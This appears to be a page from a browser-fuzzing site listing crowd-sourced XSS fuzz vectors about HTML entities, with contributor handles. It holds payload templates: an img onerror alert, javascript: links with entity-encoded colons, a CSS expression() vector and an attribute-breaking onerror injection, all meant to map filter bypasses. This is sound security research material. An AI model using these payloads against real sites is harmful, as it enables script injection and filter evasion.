Featured vector

Firefox 0.0
<!-- sample vector --> <0x3cimg src='about:blank' onerror=alert(1)>

Fuzz vector cloud

3,344,426 Successful fuzzes

Fuzz Vectors

Searching for "entities"

Your browser identified as

General Crawlers unknown

All vectors

Description Vector Created by
allowed characters in entities <a id="fuzzelement*num*" href="javascript&col*chr*on;alert">aaa</a> <script> if(document.getElementById('fuzzelement*num*').protocol==='javascript:'){ logChr(*num*); } </script> @insertScript
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Characters allowed between and in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
characters allowd in html entities <a href="javascript&co*chr*lon;alert(1)" id="fuzzelement*num*">test</a> @insertScript
Entities allowed with no semi colon htmlStr = '<div title="'+*dataentities*.replace(/;/,'')+'">test</div>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.title.length===1) { customLog(*dataentities*); } }catch(e){}; @garethheyes
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Entities allowed instead of colon for js protocol htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @peksa
Entities allowed after js protocol htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before js protocol htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed inside js protocol htmlStr = '<a href="java'+*dataentities*+'script:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; @garethheyes
Entities allowed before CSS rule htmlStr = '<div style="'+*dataentities*+'color:#cccccc;"></div>'; document.getElementById('placeholder').innerHTML = htmlStr; if(document.getElementById('placeholder').firstChild.style.color.length) { customLog(*dataentities*); } @garethheyes